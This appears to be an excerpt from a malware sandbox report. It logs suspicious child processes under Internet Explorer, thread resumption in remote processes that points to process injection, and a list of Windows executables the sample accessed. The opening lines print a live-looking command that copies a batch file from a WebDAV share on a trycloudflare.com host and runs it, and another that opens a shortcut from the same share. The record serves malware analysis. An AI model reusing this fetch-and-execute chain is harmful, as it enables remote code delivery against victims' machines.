parent_process iexplore.exe martian_process "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A & C:\Users\test22\Music\yes.bat
parent_process iexplore.exe martian_process \\hot-browser-luke-granted.trycloudflare.com\DavWWWRoot\rename.lnk
Process injection Process 2620 resumed a thread in remote process 2776
Process injection Process 2620 resumed a thread in remote process 3040
Process injection Process 148 resumed a thread in remote process 2220
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000000000003c4
suspend_count: 1
process_identifier: 2776
1 0 0

NtResumeThread

thread_handle: 0x00000000000001b8
suspend_count: 1
process_identifier: 3040
1 0 0

NtResumeThread

thread_handle: 0x00000338
suspend_count: 1
process_identifier: 2220
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe